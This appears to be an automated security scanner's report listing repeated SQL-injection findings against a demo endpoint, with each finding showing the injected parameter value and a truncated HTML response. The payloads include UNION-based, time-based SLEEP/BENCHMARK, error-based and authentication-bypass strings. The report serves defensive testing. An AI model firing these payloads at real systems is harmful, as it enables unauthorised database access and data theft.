SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1780\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1781Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1782\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1783\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1784\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1785\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1786\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1787\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1788\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1789\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1790\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1791\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1792\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter 